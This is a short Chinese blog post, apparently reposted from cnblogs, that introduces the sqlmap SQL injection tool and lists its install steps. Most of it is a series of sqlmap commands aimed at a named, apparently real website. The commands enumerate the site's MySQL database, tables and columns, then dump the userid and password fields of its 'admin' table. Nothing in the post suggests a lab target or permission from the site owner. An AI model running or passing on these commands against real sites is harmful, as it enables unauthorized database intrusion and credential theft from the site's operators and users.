标签:
简单介绍下sqlmap吧,它是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL。SQLMAP采用四种独特的SQL注入技术,分别是盲推理SQL注入,UNION查询SQL注入,堆查询和基于时间的SQL盲注入。其广泛的功能和选项包括数据库指纹,枚举,数据库提取,访问目标文件系统,并在获取完全操作权限时实行任意命令。
1、yum install git
2、git clone https://github.com/sqlmapproject/sqlmap.git
3、cd sqlmap
4、
/* 注解:获取当前用户名称
sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user
/*当前数据库
sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db
sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost"
sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" -D "wepost"
/*获取字段里面的内容
sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0
标签:
原文地址:http://www.cnblogs.com/LoveJulin/p/4269707.html